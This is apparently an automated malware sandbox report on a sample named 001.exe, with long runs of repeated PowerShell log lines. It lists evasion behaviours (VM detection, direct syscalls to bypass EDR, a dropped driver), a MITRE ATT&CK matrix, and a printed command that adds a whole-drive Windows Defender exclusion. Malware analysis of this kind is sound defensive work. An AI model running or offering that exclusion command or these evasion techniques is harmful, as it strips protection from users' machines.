Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\Desktop\001.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Users\user\Desktop\001.exeSystem information queried: FirmwareTableInformationJump to behavior
Tries to evade analysis by execution special instruction (VM detection)
Source: C:\Users\user\Desktop\001.exeSpecial instruction interceptor: First address: 140422FCE instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6376Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3438Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8028Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1660Jump to behavior
Source: C:\Users\user\Desktop\001.exeDropped PE file which has not been started: C:\Windows\Temp\1Qkj6qa_7944.sysJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2212Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008935CC FindFirstFileA,FindNextFileA,FindClose,1_2_008935CC
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B1C54 __doserrno,_errno,_errno,__doserrno,FindFirstFileA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,1_2_008B1C54
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00845BCC GetCurrentProcess,GetProcessAffinityMask,GetSystemInfo,1_2_00845BCC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: 001.exe, 00000001.00000002.1774996102.00000000004F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008AC540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_008AC540
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0085C634 GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,1_2_0085C634
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B9204 GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,1_2_008B9204
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008AC280 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_008AC280
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008AC540 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_008AC540
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008A9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_008A9924
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008A9B18 SetUnhandledExceptionFilter,1_2_008A9B18

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\001.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\
Source: C:\Users\user\Desktop\001.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Add-MpPreference -ExclusionPath C:\Jump to behavior
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Desktop\001.exeNtQuerySystemInformation: Direct from: 0x140327B7CJump to behavior
Source: C:\Users\user\Desktop\001.exeNtProtectVirtualMemory: Direct from: 0x1400026B1Jump to behavior
Source: C:\Users\user\Desktop\001.exeNtProtectVirtualMemory: Direct from: 0x1402653DBJump to behavior
Source: C:\Users\user\Desktop\001.exeNtProtectVirtualMemory: Direct from: 0x14032A3A1Jump to behavior
Source: C:\Users\user\Desktop\001.exeNtQuerySystemInformation: Direct from: 0x140329C78Jump to behavior
Source: C:\Users\user\Desktop\001.exeNtProtectVirtualMemory: Direct from: 0x140323ACBJump to behavior
Source: C:\Users\user\Desktop\001.exeNtQuerySystemInformation: Direct from: 0x14025FCB9Jump to behavior
Source: C:\Users\user\Desktop\001.exeNtQuerySystemInformation: Direct from: 0x14041A40CJump to behavior
Source: C:\Users\user\Desktop\001.exeNtQuerySystemInformation: Direct from: 0x140313F3AJump to behavior
Source: C:\Users\user\Desktop\001.exeNtProtectVirtualMemory: Direct from: 0x14025ED1BJump to behavior
Source: C:\Users\user\Desktop\001.exeCode function: GetLocaleInfoA,1_2_008BF2A8
Source: C:\Users\user\Desktop\001.exeCode function: GetLocaleInfoA,1_2_008AE5E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008A8310 GetSystemTimeAsFileTime,1_2_008A8310
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008AD80C _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,1_2_008AD80C
Source: C:\Users\user\Desktop\001.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008692C4 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,__swprintf_l,send,recv,closesocket,closesocket,closesocket,closesocket,1_2_008692C4
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BF488 bind,1_2_008BF488
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BF540 listen,1_2_008BF540
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00858C10 htons,bind,htons,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,1_2_00858C10

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API		2
LSASS Driver		1
Abuse Elevation Control Mechanism		1
Disable or Modify Tools		OS Credential Dumping2
System Time Discovery		Remote Services11
Archive Collected Data		2
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		2
LSASS Driver		1
Deobfuscate/Decode Files or Information		LSASS Memory1
File and Directory Discovery		Remote Desktop ProtocolData from Removable Media2
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt2
Windows Service		1
DLL Side-Loading		1
Abuse Elevation Control Mechanism		Security Account Manager124
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Access Token Manipulation		3
Obfuscated Files or Information		NTDS321
Security Software Discovery		Distributed Component Object ModelInput Capture11
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
Windows Service		1
Software Packing		LSA Secrets1
Process Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
Process Injection		1
DLL Side-Loading		Cached Domain Credentials121
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
File Deletion		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Masquerading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt121
Virtualization/Sandbox Evasion		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
